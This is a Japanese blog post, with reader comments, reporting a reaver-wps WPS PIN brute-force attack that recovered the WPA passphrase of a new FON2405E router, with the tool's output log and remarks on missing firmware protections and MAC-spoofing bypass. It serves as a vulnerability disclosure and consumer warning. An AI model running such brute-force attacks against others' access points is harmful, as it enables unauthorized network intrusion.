SSブログ

【WPS の脆弱性 - 新品の FON2405E 】 reaver-wps [reaver-wps]

P1070028
新品未使用の FON2405E で,reaver-wps による WPS ブルートフォース攻撃が成功した。
OS: BackTrack 5 R1 ,無線アダプタ: ra73usb

[+] Trying pin 63742442
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 38027 seconds
[+] WPS PIN: '63742442'
[+] WPA PSK: 'eimiezeeye'
[+] AP SSID: 'MyPlace'
root@bt:~#

所要時間は 11 時間。パソコンの性能がやや低いためか,公称の 4–10 時間よりも少々時間を要している。

FON2405E は プッシュボタン方式による WPS 簡単接続をサポートしているが,PIN 方式の脆弱性で,攻撃が可能であることが分かった。

FON の設定画面には,WPS を無効にするメニューは見当たらない。
reaver51
FON2405E は,MyPlace というプライベート用のネットワークがデフォルトで有効になっている。
WPA2-PSK で,強固なセキュリティになっているが,FON の電波が届くところにパソコンを置いて,10時間程度 reaver-wps を走らせればパスフレーズが判明してしまう。
パスフレーズの文字数や文字種を増やしても,この攻撃に対しては,意味がない。 
異なる PIN コードを何度も送信してきたら,ロックするなど,ファームウェアの強化が必要だが,FON2405E の設定画面にはファームウェア更新メニューが無い。
また前述のとおり,WPS を無効にするメニューも無い。

セキュリティが心配な人は,折角 softbank からもらった FON でも使わない方がいいかもしれない。

  • FON2305E も同様。
  • かなり大変だが,ファームウェアを書き換える方法はある。-> こちら
  • MACアドレスフィルタリングも偽装で回避できる。

reaver-wps


nice!(2)  コメント(3)  トラックバック(0) 

nice! 2

コメント 3

venus

>>WPS を無効にするメニューも無い。

新品のFON2405Eはファームウェアが古い状態の為、
WPSボタンが無いと思われます。

私の2405Eでは 'WPSボタン' があります。
( ファームウェアバージョン 4.0.2.3 )

ご指摘の通りWPSボタンを オフ にしたいと思います。
by venus (2012-02-26 10:15) 

atc-500

4.0.2.3 では,WPSを無効にできる設定画面があるんですね。
ファームは自動的にアップデートされるのでしょうか。

by atc-500 (2012-02-26 16:19) 

venus

 返信ありがとうございます。

自分の場合、気がついたらファーム4.0.2.3になっていた (笑)
2405Eファームウェアは自動アップなのでしょう。

2ch でも次の書き込みでありました。

FON総合スレッド Part32【無線LAN無料相互利用】
< 110 >
うちの2405Eのファームは4.0.1.4→4.0.1.7→4.0.2.3までUPしたことは確認 ・・・・
by venus (2012-02-26 18:13) 

コメントを書く

お名前:
URL:
コメント:
画像認証:
下の画像に表示されている文字を入力してください。

Facebook コメント

トラックバック 0

この広告は前回の更新から一定期間経過したブログに表示されています。更新すると自動で解除されます。